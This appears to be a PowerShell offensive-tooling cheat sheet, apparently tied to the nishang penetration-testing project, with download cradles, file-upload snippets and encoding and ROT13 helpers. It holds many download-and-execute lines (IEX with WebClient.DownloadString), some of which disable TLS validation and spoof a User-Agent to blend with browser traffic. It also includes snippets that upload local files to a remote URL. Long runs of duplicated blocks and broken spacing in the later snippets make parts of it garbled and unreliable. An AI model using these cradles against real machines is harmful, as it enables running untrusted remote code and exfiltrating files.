$bitsJob = @{
    Source      = "http://example.com/file.exe"
    Destination = "C:\path\to\file.exe"
}
Start-BitsTransfer @bitsJob
Download a file using the System.Net.WebClient class
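# WebClient download; DownloadFile is binary-safe. Dispose the client when done (it holds
# the underlying WebRequest/connection until collected).
$webclient = New-Object System.Net.WebClient
try {
    $webclient.DownloadFile("http://example.com/file.exe", "C:\path\to\file.exe")
} finally {
    $webclient.Dispose()
}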
Download a file using the System.Net.HttpWebRequest class
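# Binary-safe download over HttpWebRequest. The original piped StreamReader.ReadToEnd()
# into Out-File, which decodes the body as text and re-encodes it (UTF-16 + BOM + trailing
# newline) — that corrupts any non-text payload such as an .exe. Copy the raw response
# stream to a FileStream instead, and close everything even when the copy throws.
$request = [System.Net.HttpWebRequest]::Create("http://example.com/file.exe")
$response = $request.GetResponse()
$stream = $response.GetResponseStream()
$file = [System.IO.File]::Create("C:\path\to\file.exe")
try {
    $stream.CopyTo($file)
} finally {
    $file.Close()
    $stream.Close()
    $response.Close()
}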
Download a file using System.Net.WebClient through a proxy server (proxy authenticated with the current user's default credentials)
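# Explicit proxy; DefaultCredentials sends the current Windows token (NTLM/Kerberos) to the
# proxy, which is what most corporate proxies expect. Nothing authenticates to the target.
$proxy = New-Object System.Net.WebProxy("http://proxyserver:port")
$proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials
$webclient = New-Object System.Net.WebClient
$webclient.Proxy = $proxy
try {
    $webclient.DownloadFile("http://example.com/file.exe", "C:\path\to\file.exe")
} finally {
    $webclient.Dispose()
}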
Download a file using System.Net.WebClient through a proxy server, with explicit credentials for the proxy
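# Explicit proxy with explicit proxy credentials. The plaintext "username"/"password" live in
# the script — keep them out of anything that gets committed or transcribed.
$proxy = New-Object System.Net.WebProxy("http://proxyserver:port")
$proxy.Credentials = New-Object System.Net.NetworkCredential("username", "password")
$webclient = New-Object System.Net.WebClient
$webclient.Proxy = $proxy
try {
    $webclient.DownloadFile("http://example.com/file.exe", "C:\path\to\file.exe")
} finally {
    $webclient.Dispose()
}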
Download a file using System.Net.WebClient through a proxy server, with explicit credentials for both the proxy and the target server
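# Proxy credentials go on the WebProxy, target credentials on the WebClient. WebClient sends
# the target credentials only in response to a 401 challenge (no pre-authentication).
$proxy = New-Object System.Net.WebProxy("http://proxyserver:port")
$proxy.Credentials = New-Object System.Net.NetworkCredential("username", "password")
$webclient = New-Object System.Net.WebClient
$webclient.Proxy = $proxy
$webclient.Credentials = New-Object System.Net.NetworkCredential("username", "password")
try {
    $webclient.DownloadFile("http://example.com/file.exe", "C:\path\to\file.exe")
} finally {
    $webclient.Dispose()
}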
Download a file using System.Net.WebClient through a proxy server, with explicit credentials for both the proxy and the target server (duplicate of the snippet above)
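# Same as the previous snippet: proxy credentials on the WebProxy, target credentials on the
# WebClient (sent on 401 challenge only). Client disposed when done.
$proxy = New-Object System.Net.WebProxy("http://proxyserver:port")
$proxy.Credentials = New-Object System.Net.NetworkCredential("username", "password")
$webclient = New-Object System.Net.WebClient
$webclient.Proxy = $proxy
$webclient.Credentials = New-Object System.Net.NetworkCredential("username", "password")
try {
    $webclient.DownloadFile("http://example.com/file.exe", "C:\path\to\file.exe")
} finally {
    $webclient.Dispose()
}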
Download a file using System.Net.WebClient through a proxy server, with explicit credentials for both the proxy and the target server (duplicate of the snippet above)
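# Same as the previous snippet: proxy credentials on the WebProxy, target credentials on the
# WebClient (sent on 401 challenge only). Client disposed when done.
$proxy = New-Object System.Net.WebProxy("http://proxyserver:port")
$proxy.Credentials = New-Object System.Net.NetworkCredential("username", "password")
$webclient = New-Object System.Net.WebClient
$webclient.Proxy = $proxy
$webclient.Credentials = New-Object System.Net.NetworkCredential("username", "password")
try {
    $webclient.DownloadFile("http://example.com/file.exe", "C:\path\to\file.exe")
} finally {
    $webclient.Dispose()
}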
Download a file using System.Net.WebClient through a proxy server, with explicit credentials for both the proxy and the target server (duplicate of the snippet above)
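# Same as the previous snippet: proxy credentials on the WebProxy, target credentials on the
# WebClient (sent on 401 challenge only). Client disposed when done.
$proxy = New-Object System.Net.WebProxy("http://proxyserver:port")
$proxy.Credentials = New-Object System.Net.NetworkCredential("username", "password")
$webclient = New-Object System.Net.WebClient
$webclient.Proxy = $proxy
$webclient.Credentials = New-Object System.Net.NetworkCredential("username", "password")
try {
    $webclient.DownloadFile("http://example.com/file.exe", "C:\path\to\file.exe")
} finally {
    $webclient.Dispose()
}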
Download & execute a PS1 script (Invoke-* tooling) with iwr / WebClient and IEX
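# Download to disk and run: the .ps1 on disk is subject to the execution policy and leaves a
# forensic artefact (file + possible Zone.Identifier); the in-memory variants below do not.
iwr http://example.com/script.ps1 -OutFile script.ps1; iex .\script.ps1
# In-memory: DownloadString returns the script text, IEX evaluates it in the current scope.
# Script-block logging (4104) and AMSI still see the decoded content.
IEX ((New-Object Net.WebClient).DownloadString('http://example.com/script.ps1'))
IEX (New-Object Net.WebClient).DownloadString('http://example.com/script.ps1')
# The original line had an unbalanced closing parenthesis, which is a parse error.
iex (iwr http://example.com/script.ps1)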
Download & execute a PS1 script (Invoke-* tooling) with iwr and IEX, in memory (no -OutFile)
# iwr's response object stringifies to its Content, which IEX then evaluates; -UseBasicParsing
# avoids the IE DOM dependency in Windows PowerShell 5.1.
$scriptText = iwr http://example.com/script.ps1 -UseBasicParsing
iex $scriptText
Download & execute a PS1 script (Invoke-* tooling) with iwr and IEX, in memory, with HTTP basic auth
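# Credentials embedded in the URL: they appear in proxy logs, history and script-block logs,
# and NOTE(review): Windows PowerShell's Invoke-WebRequest does not appear to turn the URL
# userinfo into an Authorization header — verify against your server. The explicit-header
# form below works in both Windows PowerShell and PowerShell 6+.
iex (iwr http://username:password@example.com/script.ps1 -UseBasicParsing)
$basic = [Convert]::ToBase64String([Text.Encoding]::ASCII.GetBytes("username:password"))
iex (iwr http://example.com/script.ps1 -UseBasicParsing -Headers @{ Authorization = "Basic $basic" })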
Download & execute a PS1 script (Invoke-* tooling) with WebClient and IEX, in memory, with credentials for the proxy and the target
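# Proxy credentials on the WebProxy, target credentials on the WebClient (sent on a 401
# challenge). The downloaded text is evaluated with iex; dispose the client afterwards.
$proxy = New-Object System.Net.WebProxy("http://proxyserver:port")
$proxy.Credentials = New-Object System.Net.NetworkCredential("username", "password")
$webclient = New-Object System.Net.WebClient
$webclient.Proxy = $proxy
$webclient.Credentials = New-Object System.Net.NetworkCredential("username", "password")
try {
    iex ($webclient.DownloadString("http://example.com/script.ps1"))
} finally {
    $webclient.Dispose()
}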
Download & execute a PS1 script (Invoke-* tooling) with WebClient and IEX over HTTPS, with proxy and target credentials and TLS certificate validation disabled
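$proxy = New-Object System.Net.WebProxy("http://proxyserver:port")
$proxy.Credentials = New-Object System.Net.NetworkCredential("username", "password")
$webclient = New-Object System.Net.WebClient
$webclient.Proxy = $proxy
$webclient.Credentials = New-Object System.Net.NetworkCredential("username", "password")
# WebClient has no ServerCertificateValidationCallback property — the original assignment
# throws "property cannot be found". The callback lives on ServicePointManager and is
# process-wide: returning $true disables TLS certificate validation for every HTTPS request
# in this session (anyone on path can serve you a script). Scope it to this one call and
# restore the previous callback afterwards.
$previousCallback = [System.Net.ServicePointManager]::ServerCertificateValidationCallback
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }
try {
    iex ($webclient.DownloadString("https://example.com/script.ps1"))
} finally {
    [System.Net.ServicePointManager]::ServerCertificateValidationCallback = $previousCallback
    $webclient.Dispose()
}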
Download & execute a PS1 script (Invoke-* tooling) with WebClient and IEX over HTTPS, with proxy and target credentials, TLS validation disabled and a browser-like User-Agent
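$proxy = New-Object System.Net.WebProxy("http://proxyserver:port")
$proxy.Credentials = New-Object System.Net.NetworkCredential("username", "password")
$webclient = New-Object System.Net.WebClient
$webclient.Proxy = $proxy
$webclient.Credentials = New-Object System.Net.NetworkCredential("username", "password")
# The original split this literal across two lines, which breaks the string. Blending in
# with browser traffic: note Chrome/58 is old enough to stand out on its own in proxy logs.
$webclient.UserAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
# WebClient has no ServerCertificateValidationCallback property (the original line throws);
# the process-wide ServicePointManager callback is used and restored after the call.
# Returning $true disables TLS certificate validation for the whole session — MITM risk.
$previousCallback = [System.Net.ServicePointManager]::ServerCertificateValidationCallback
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }
try {
    iex ($webclient.DownloadString("https://example.com/script.ps1"))
} finally {
    [System.Net.ServicePointManager]::ServerCertificateValidationCallback = $previousCallback
    $webclient.Dispose()
}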
Download & execute a PS1 script (Invoke-* tooling) with WebClient and IEX over HTTPS, with proxy and target credentials, TLS validation disabled and a custom User-Agent (nothing here bypasses the proxy)
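$proxy = New-Object System.Net.WebProxy("http://proxyserver:port")
$proxy.Credentials = New-Object System.Net.NetworkCredential("username", "password")
$webclient = New-Object System.Net.WebClient
$webclient.Proxy = $proxy
# Explicit target credentials. The original then set UseDefaultCredentials = $true, whose
# setter replaces Credentials with the current Windows token and silently discards these;
# pick one or the other. Nothing in this snippet bypasses the proxy.
$webclient.Credentials = New-Object System.Net.NetworkCredential("username", "password")
$webclient.UserAgent = "Mozilla/5.0 (Windows NT 10.0;Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
# WebClient has no ServerCertificateValidationCallback property (the original line throws);
# the process-wide ServicePointManager callback is used and restored afterwards. Returning
# $true disables TLS certificate validation for the whole session — MITM risk.
$previousCallback = [System.Net.ServicePointManager]::ServerCertificateValidationCallback
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }
try {
    iex ($webclient.DownloadString("https://example.com/script.ps1"))
} finally {
    [System.Net.ServicePointManager]::ServerCertificateValidationCallback = $previousCallback
    $webclient.Dispose()
}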
Download & execute a PS1 script (Invoke-* tooling) with WebClient and IEX over HTTPS, with proxy and target credentials, TLS validation disabled and a custom User-Agent (same as the snippet above; no proxy bypass)
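$proxy = New-Object System.Net.WebProxy("http://proxyserver:port")
$proxy.Credentials = New-Object System.Net.NetworkCredential("username", "password")
$webclient = New-Object System.Net.WebClient
$webclient.Proxy = $proxy
# Explicit target credentials; the original's later UseDefaultCredentials = $true overwrote
# them with the current Windows token, so it is dropped. Nothing here bypasses the proxy.
$webclient.Credentials = New-Object System.Net.NetworkCredential("username", "password")
$webclient.UserAgent = "Mozilla/5.0 (Windows NT 10.0;Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
# WebClient has no ServerCertificateValidationCallback property (the original line throws);
# the process-wide ServicePointManager callback is set for this call only and restored.
# Returning $true disables TLS certificate validation — MITM risk.
$previousCallback = [System.Net.ServicePointManager]::ServerCertificateValidationCallback
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }
try {
    iex ($webclient.DownloadString("https://example.com/script.ps1"))
} finally {
    [System.Net.ServicePointManager]::ServerCertificateValidationCallback = $previousCallback
    $webclient.Dispose()
}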
Download & execute a PS1 script (Invoke-* tooling) with WebClient and IEX over HTTPS — duplicate of the snippet above
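$proxy = New-Object System.Net.WebProxy("http://proxyserver:port")
$proxy.Credentials = New-Object System.Net.NetworkCredential("username", "password")
$webclient = New-Object System.Net.WebClient
$webclient.Proxy = $proxy
# Explicit target credentials; the original's later UseDefaultCredentials = $true overwrote
# them with the current Windows token, so it is dropped. Nothing here bypasses the proxy.
$webclient.Credentials = New-Object System.Net.NetworkCredential("username", "password")
$webclient.UserAgent = "Mozilla/5.0 (Windows NT 10.0;Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
# WebClient has no ServerCertificateValidationCallback property (the original line throws);
# the process-wide ServicePointManager callback is set for this call only and restored.
# Returning $true disables TLS certificate validation — MITM risk.
$previousCallback = [System.Net.ServicePointManager]::ServerCertificateValidationCallback
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }
try {
    iex ($webclient.DownloadString("https://example.com/script.ps1"))
} finally {
    [System.Net.ServicePointManager]::ServerCertificateValidationCallback = $previousCallback
    $webclient.Dispose()
}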
Download & execute a PS1 script (Invoke-* tooling) with WebClient and IEX over HTTPS — duplicate of the snippet above
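$proxy = New-Object System.Net.WebProxy("http://proxyserver:port")
$proxy.Credentials = New-Object System.Net.NetworkCredential("username", "password")
$webclient = New-Object System.Net.WebClient
$webclient.Proxy = $proxy
# Explicit target credentials; the original's later UseDefaultCredentials = $true overwrote
# them with the current Windows token, so it is dropped. Nothing here bypasses the proxy.
$webclient.Credentials = New-Object System.Net.NetworkCredential("username", "password")
$webclient.UserAgent = "Mozilla/5.0 (Windows NT 10.0;Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
# WebClient has no ServerCertificateValidationCallback property (the original line throws);
# the process-wide ServicePointManager callback is set for this call only and restored.
# Returning $true disables TLS certificate validation — MITM risk.
$previousCallback = [System.Net.ServicePointManager]::ServerCertificateValidationCallback
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }
try {
    iex ($webclient.DownloadString("https://example.com/script.ps1"))
} finally {
    [System.Net.ServicePointManager]::ServerCertificateValidationCallback = $previousCallback
    $webclient.Dispose()
}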
Download & execute a PS1 script (Invoke-* tooling) with WebClient and IEX over HTTPS — duplicate of the snippet above
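$proxy = New-Object System.Net.WebProxy("http://proxyserver:port")
$proxy.Credentials = New-Object System.Net.NetworkCredential("username", "password")
$webclient = New-Object System.Net.WebClient
$webclient.Proxy = $proxy
# Explicit target credentials; the original's later UseDefaultCredentials = $true overwrote
# them with the current Windows token, so it is dropped. Nothing here bypasses the proxy.
$webclient.Credentials = New-Object System.Net.NetworkCredential("username", "password")
$webclient.UserAgent = "Mozilla/5.0 (Windows NT 10.0;Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
# WebClient has no ServerCertificateValidationCallback property (the original line throws);
# the process-wide ServicePointManager callback is set for this call only and restored.
# Returning $true disables TLS certificate validation — MITM risk.
$previousCallback = [System.Net.ServicePointManager]::ServerCertificateValidationCallback
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }
try {
    iex ($webclient.DownloadString("https://example.com/script.ps1"))
} finally {
    [System.Net.ServicePointManager]::ServerCertificateValidationCallback = $previousCallback
    $webclient.Dispose()
}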
Download & execute a PS1 script (Invoke-* tooling) with WebClient and IEX over HTTPS — duplicate of the snippet above
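$proxy = New-Object System.Net.WebProxy("http://proxyserver:port")
$proxy.Credentials = New-Object System.Net.NetworkCredential("username", "password")
$webclient = New-Object System.Net.WebClient
$webclient.Proxy = $proxy
# Explicit target credentials; the original's later UseDefaultCredentials = $true overwrote
# them with the current Windows token, so it is dropped. Nothing here bypasses the proxy.
$webclient.Credentials = New-Object System.Net.NetworkCredential("username", "password")
$webclient.UserAgent = "Mozilla/5.0 (Windows NT 10.0;Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
# WebClient has no ServerCertificateValidationCallback property (the original line throws);
# the process-wide ServicePointManager callback is set for this call only and restored.
# Returning $true disables TLS certificate validation — MITM risk.
$previousCallback = [System.Net.ServicePointManager]::ServerCertificateValidationCallback
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }
try {
    iex ($webclient.DownloadString("https://example.com/script.ps1"))
} finally {
    [System.Net.ServicePointManager]::ServerCertificateValidationCallback = $previousCallback
    $webclient.Dispose()
}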
Download & execute a PS1 script (Invoke-* tooling) with WebClient and IEX over HTTPS — duplicate of the snippet above
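$proxy = New-Object System.Net.WebProxy("http://proxyserver:port")
$proxy.Credentials = New-Object System.Net.NetworkCredential("username", "password")
$webclient = New-Object System.Net.WebClient
$webclient.Proxy = $proxy
# Explicit target credentials; the original's later UseDefaultCredentials = $true overwrote
# them with the current Windows token, so it is dropped. Nothing here bypasses the proxy.
$webclient.Credentials = New-Object System.Net.NetworkCredential("username", "password")
$webclient.UserAgent = "Mozilla/5.0 (Windows NT 10.0;Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
# WebClient has no ServerCertificateValidationCallback property (the original line throws);
# the process-wide ServicePointManager callback is set for this call only and restored.
# Returning $true disables TLS certificate validation — MITM risk.
$previousCallback = [System.Net.ServicePointManager]::ServerCertificateValidationCallback
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }
try {
    iex ($webclient.DownloadString("https://example.com/script.ps1"))
} finally {
    [System.Net.ServicePointManager]::ServerCertificateValidationCallback = $previousCallback
    $webclient.Dispose()
}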
Download & execute a PS1 script (Invoke-* tooling) with WebClient and IEX over HTTPS — duplicate of the snippet above
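$proxy = New-Object System.Net.WebProxy("http://proxyserver:port")
$proxy.Credentials = New-Object System.Net.NetworkCredential("username", "password")
$webclient = New-Object System.Net.WebClient
$webclient.Proxy = $proxy
# Explicit target credentials; the original's later UseDefaultCredentials = $true overwrote
# them with the current Windows token, so it is dropped. Nothing here bypasses the proxy.
$webclient.Credentials = New-Object System.Net.NetworkCredential("username", "password")
$webclient.UserAgent = "Mozilla/5.0 (Windows NT 10.0;Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
# WebClient has no ServerCertificateValidationCallback property (the original line throws);
# the process-wide ServicePointManager callback is set for this call only and restored.
# Returning $true disables TLS certificate validation — MITM risk.
$previousCallback = [System.Net.ServicePointManager]::ServerCertificateValidationCallback
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }
try {
    iex ($webclient.DownloadString("https://example.com/script.ps1"))
} finally {
    [System.Net.ServicePointManager]::ServerCertificateValidationCallback = $previousCallback
    $webclient.Dispose()
}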
Download & execute a PS1 script (Invoke-* tooling) with WebClient and IEX over HTTPS — duplicate of the snippet above
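$proxy = New-Object System.Net.WebProxy("http://proxyserver:port")
$proxy.Credentials = New-Object System.Net.NetworkCredential("username", "password")
$webclient = New-Object System.Net.WebClient
$webclient.Proxy = $proxy
# Explicit target credentials; the original's later UseDefaultCredentials = $true overwrote
# them with the current Windows token, so it is dropped. Nothing here bypasses the proxy.
$webclient.Credentials = New-Object System.Net.NetworkCredential("username", "password")
$webclient.UserAgent = "Mozilla/5.0 (Windows NT 10.0;Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
# WebClient has no ServerCertificateValidationCallback property (the original line throws);
# the process-wide ServicePointManager callback is set for this call only and restored.
# Returning $true disables TLS certificate validation — MITM risk.
$previousCallback = [System.Net.ServicePointManager]::ServerCertificateValidationCallback
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }
try {
    iex ($webclient.DownloadString("https://example.com/script.ps1"))
} finally {
    [System.Net.ServicePointManager]::ServerCertificateValidationCallback = $previousCallback
    $webclient.Dispose()
}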
Download & execute a PS1 script (Invoke-* tooling) with WebClient and IEX
# Classic in-memory cradle: DownloadString returns the script text and IEX evaluates it in the
# current scope (still visible to AMSI and 4104 script-block logging).
$cradle = New-Object Net.WebClient
IEX $cradle.DownloadString("http://example.com/script.ps1")
Download & Execute PS1 Script for Invoke-* with Invoke-WebRequest cmdlet
# Save to disk, then IEX the path string, which runs the script (execution policy applies to the
# file on disk and it remains as an artefact).
$scriptPath = "C:\path\to\script.ps1"
Invoke-WebRequest -Uri "http://example.com/script.ps1" -OutFile $scriptPath
IEX $scriptPath
Download & Execute PS1 Script for Invoke-* with Invoke-Expression cmdlet
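Invoke-WebRequest -Uri "http://example.com/script.ps1" -OutFile "C:\path\to\script.ps1"
# -Raw is required: without it Get-Content returns an array of lines, which Invoke-Expression
# joins with spaces into one line — the first comment then swallows the rest of the script and
# multi-line constructs break.
Invoke-Expression (Get-Content C:\path\to\script.ps1 -Raw)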
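# `wget` and `curl` are aliases of Invoke-WebRequest only in Windows PowerShell 5.1; PowerShell 6+
# dropped them, so there they run the real curl.exe/wget.exe (with their own switches). For the
# alias, `-o` is ambiguous (OutFile / OutVariable / OutBuffer) and errors out — spell out -OutFile.
wget http://example.com/file.exe -OutFile C:\path\to\file.exe
curl -OutFile C:\path\to\file.exe http://example.com/file.exe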
Download a file using the System.Net.HttpWebRequest class
$request = [System.Net.HttpWebRequest ]::Create(" http://example.com/file.exe" )
$response = $request.GetResponse ()
$stream = $response.GetResponseStream ()
$reader = New-Object System.IO.StreamReader($stream )
$reader.ReadToEnd () | Out-File " C:\path\to\file.exe"
$reader.Close ()
$stream.Close ()
$response.Close ()
Upload a file to the internet
Invoke-WebRequest - Uri " http://example.com/upload" - Method Post - InFile " C:\path\to\file.exe"
Upload a file using BITS (Background Intelligent Transfer Service)
Start-BitsTransfer - Source " C:\path\to\file.exe" - Destination " http://example.com/upload"
Upload a file using the System.Net.WebClient class
$webclient = New-Object System.Net.WebClient
$webclient.UploadFile (" http://example.com/upload" , " POST" , " C:\path\to\file.exe" )
$webclient.Dispose ()
Upload a file using the System.Net.HttpWebRequest class
$request = [System.Net.HttpWebRequest ]::Create(" http://example.com/upload" )
$request.Method = " POST"
$request.ContentType = " application/octet-stream"
$request.ContentLength = (Get-Item " C:\path\to\file.exe" ).Length
$stream = $request.GetRequestStream ()
$stream.Write ((Get-Content " C:\path\to\file.exe" - Encoding Byte), 0 , (Get-Content " C:\path\to\file.exe" - Encoding Byte).Length)
$stream.Close ()
$request.GetResponse ()
Upload a file using the System.IO.File class
$webclient = New-Object System.Net.WebClient
$webclient.UploadFile (" http://example.com/upload" , " POST" , " C:\path\to\file.exe" )
$webclient.Dispose ()
Upload a file using the System.IO.File class with a custom header
$webclient = New-Object System.Net.WebClient
$webclient.Headers.Add (" Authorization" , " Bearer YOUR_ACCESS_TOKEN" )
$webclient.UploadFile (" http://example.com/upload" , " POST" , " C:\path\to\file.exe" )
$webclient.Dispose ()
Upload a file using the System.IO.File class with a custom header and a specific content type
$webclient = New-Object System.Net.WebClient
$webclient.Headers.Add (" Authorization" , " Bearer YOUR_ACCESS_TOKEN" )
$webclient.Headers.Add (" Content-Type" , " application/octet-stream" )
$webclient.UploadFile (" http://example.com/upload" , " POST" , " C:\path\to\file.exe" )
$webclient.Dispose ()
Upload a file using the System.IO.File class with a custom header, a specific content type, and a custom boundary
$webclient = New-Object System.Net.WebClient
$webclient.Headers.Add (" Authorization" , " Bearer YOUR_ACCESS_TOKEN" )
$webclient.Headers.Add (" Content-Type" , " multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW" )
$webclient.UploadFile (" http://example.com/upload" , " POST" , " C:\path\to\file.exe" )
$webclient.Dispose ()
Upload a file using the System.IO.File class with a custom header, a specific content type, and a custom boundary and a custom filename
$webclient = New-Object System.Net.WebClient
$webclient.Headers.Add (" Authorization" , " Bearer YOUR_ACCESS_TOKEN" )
$webclient.Headers.Add (" Content-Type" , " multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW" )
$webclient.UploadFile (" http://example.com/upload" , " POST" , " C:\path\to\file.exe" , " custom_filename.exe" )
$webclient.Dispose ()
Upload a file using the System.IO.File class with a custom header, a specific content type, and a custom boundary and a custom filename and a custom content disposition
$webclient = New-Object System.Net.WebClient
$webclient.Headers.Add (" Authorization" , " Bearer YOUR_ACCESS_TOKEN" )
$webclient.Headers.Add (" Content-Type" , " multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW" )
$webclient.UploadFile (" http://example.com/upload" , " POST" , " C:\path\to\file.exe" , " custom_filename.exe" , " attachment; filename=custom_filename.exe" )
$webclient.Dispose ()
Upload a file using the System.IO.File class with a custom header, a specific content type, and a custom boundary and a custom filename and a custom content disposition and a custom content transfer encoding
$webclient = New-Object System.Net.WebClient
$webclient.Headers.Add (" Authorization" , " Bearer YOUR_ACCESS_TOKEN" )
$webclient.Headers.Add (" Content-Type" , " multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW" )
$webclient.UploadFile (" http://example.com/upload" , " POST" , " C:\path\to\file.exe" , " custom_filename.exe" , " attachment; filename=custom_filename.exe" , " base64" )
$webclient.Dispose ()
[System.Text.Encoding ]::UTF8.GetString([System.Convert ]::FromBase64String(" SmVubnlMYWIK" ))
[System.Convert ]::ToBase64String([System.Text.Encoding ]::UTF8.GetBytes(" JennyLab" ))
Convert a string to a byte array
[System.Text.Encoding ]::UTF8.GetBytes(" JennyLab" )
Convert a byte array to a string
[System.Text.Encoding ]::UTF8.GetString([byte []]0x48 , 0x65 , 0x6c , 0x6c , 0x6f , 0x20 , 0x57 , 0x6f , 0x72 , 0x6c , 0x64 , 0x21 )
Convert a string to a byte array with a specific encoding
[System.Text.Encoding ]::ASCII.GetBytes(" JennyLab" )
Convert a byte array to a hex string
[System.BitConverter ]::ToString([byte []]0x48 , 0x65 , 0x6c , 0x6c , 0x6f , 0x20 , 0x57 , 0x6f , 0x72 , 0x6c , 0x64 , 0x21 )
Convert a hex string to a byte array
[System.Convert ]::FromBase64String(" SmVubnlMYWIK" )
Convert a byte array to a GUID
Convert a GUID to a byte array
[System.Text.Encoding ]::UTF8.GetBytes([System.Guid ]::NewGuid())
Convert a byte array to a Base64 string
[System.Convert ]::ToBase64String([System.Text.Encoding ]::UTF8.GetBytes(" JennyLab" ))
Function for converting Base64 string to decoded file
PS > Base64ToString base64.txt
Base64ToString from string
PS > Base64ToString dGVzdGVzdA== - IsString
Base64ToString Code Function
# Decodes a Base64 blob and writes the plaintext to a file.
#   $Base64Strfile - the Base64 text itself when -IsString is given, otherwise the path of a file holding it
#   $outputfile    - destination path for the decoded text (default .\base64decoded.txt)
#   $IsString      - treat $Base64Strfile as Base64 text rather than as a path
# Outputs the decoded string to the pipeline, then writes it to $outputfile as ASCII and reports the path.
# NOTE(review): the bytes are decoded as UTF-16LE (Encoding.Unicode) but written back as ASCII, so
# non-ASCII content is altered on disk and UTF-8 input decodes to garbage — confirm the expected
# encoding before relying on the file.
function Base64ToString
{
[CmdletBinding ()] Param (
[Parameter (Position = 0 , Mandatory = $True )]
[String ]
$Base64Strfile ,
[Parameter (Position = 1 , Mandatory = $False )]
[String ]
$outputfile = " .\base64decoded.txt" ,
[Switch ]
$IsString
)
if ($IsString -eq $true )
{
$base64string = [System.Convert ]::FromBase64String($Base64Strfile )
}
else
{
# Get-Content yields one string per line; PowerShell joins them with a space when the
# argument is coerced to a single string, and FromBase64String ignores that whitespace.
$base64string = [System.Convert ]::FromBase64String((Get-Content $Base64Strfile ))
}
$decodedstring = [System.Text.Encoding ]::Unicode.GetString($base64string )
$decodedstring
Out-File - InputObject $decodedstring - Encoding ascii - FilePath " $outputfile "
Write-Output " Decoded data written to file $outputfile "
}
http://labofapenetrationtester.blogspot.com/
https://github.com/samratashok/nishang
# ROT13-transforms a string or the contents of a file by piping it through .\rot13.ps1, and writes
# the result to $outputfile.
#   $String     - the text itself when -IsString is given, otherwise the path of a file to transform
#   $outputfile - destination path (default .\rot13decoded.txt)
#   $IsString   - treat $String as text rather than as a path
# Only the "written to file" message reaches the pipeline; the transformed text is not emitted.
# NOTE(review): `.\rot13.ps1` is resolved against the current directory, so this fails when the
# helper script is not in the working directory (or is blocked by execution policy).
# NOTE(review): PowerShell function names are case-insensitive, so defining this `Rot13` and the
# `rot13` helper below in the same session makes the later definition replace the earlier one.
function Rot13
{
[CmdletBinding ()] Param (
[Parameter (Position = 0 , Mandatory = $True )]
[String ]
$String ,
[Parameter (Position = 1 , Mandatory = $False )]
[String ]
$outputfile = " .\rot13decoded.txt" ,
[Switch ]
$IsString
)
if ($IsString -eq $true )
{
$rot13string = $String | .\rot13.ps1
}
else
{
# Get-Content emits one line at a time, so the helper sees each line separately.
$rot13string = (Get-Content $String ) | .\rot13.ps1
}
Out-File - InputObject $rot13string - Encoding ascii - FilePath " $outputfile "
Write-Output " Decoded data written to file $outputfile "
}
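# ROT13-rotates the letters of $str (A-Z and a-z); every other character passes through unchanged.
#   $str - input text; $null or an empty string yields an empty string
# Returns the rotated string. Applying the function twice restores the input.
# Fix: the original tested `[A-Z]`/`[a-z]` first, which matched every letter and pushed N-Z/n-z
# past the end of the alphabet (the `[A-M]`/`[a-m]` branches were unreachable); the rotation is
# now done modulo 26 within each case, and the characters are joined with no separator.
function rot13 ($str ) {
  $out = foreach ($c in ([string]$str).ToCharArray()) {
    $code = [int][char]$c
    if ($code -ge 65 -and $code -le 90) {
      # Upper case: offset from 'A', rotate, wrap within A..Z.
      [char](65 + (($code - 65 + 13) % 26))
    } elseif ($code -ge 97 -and $code -le 122) {
      # Lower case: same, relative to 'a'.
      [char](97 + (($code - 97 + 13) % 26))
    } else {
      $c
    }
  }
  -join $out
}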
Function rot13 (Rot13.ps1)
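# ROT13-rotates the letters of $str (A-Z and a-z); every other character passes through unchanged.
#   $str - input text; $null or an empty string yields an empty string
# Returns the rotated string. Applying the function twice restores the input.
# Fix: the original tested `[A-Z]`/`[a-z]` first, which matched every letter and pushed N-Z/n-z
# past the end of the alphabet (the `[A-M]`/`[a-m]` branches were unreachable); the rotation is
# now done modulo 26 within each case, and the characters are joined with no separator.
function rot13 ($str ) {
  $out = foreach ($c in ([string]$str).ToCharArray()) {
    $code = [int][char]$c
    if ($code -ge 65 -and $code -le 90) {
      # Upper case: offset from 'A', rotate, wrap within A..Z.
      [char](65 + (($code - 65 + 13) % 26))
    } elseif ($code -ge 97 -and $code -le 122) {
      # Lower case: same, relative to 'a'.
      [char](97 + (($code - 97 + 13) % 26))
    } else {
      $c
    }
  }
  -join $out
}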
ConvertTo-ROT13 Use example:
PS > ConvertTo-ROT13 - rot13string supersecret
PS > ConvertTo-ROT13 - rot13string fhcrefrperg
ConvertTo-ROT13 Author:
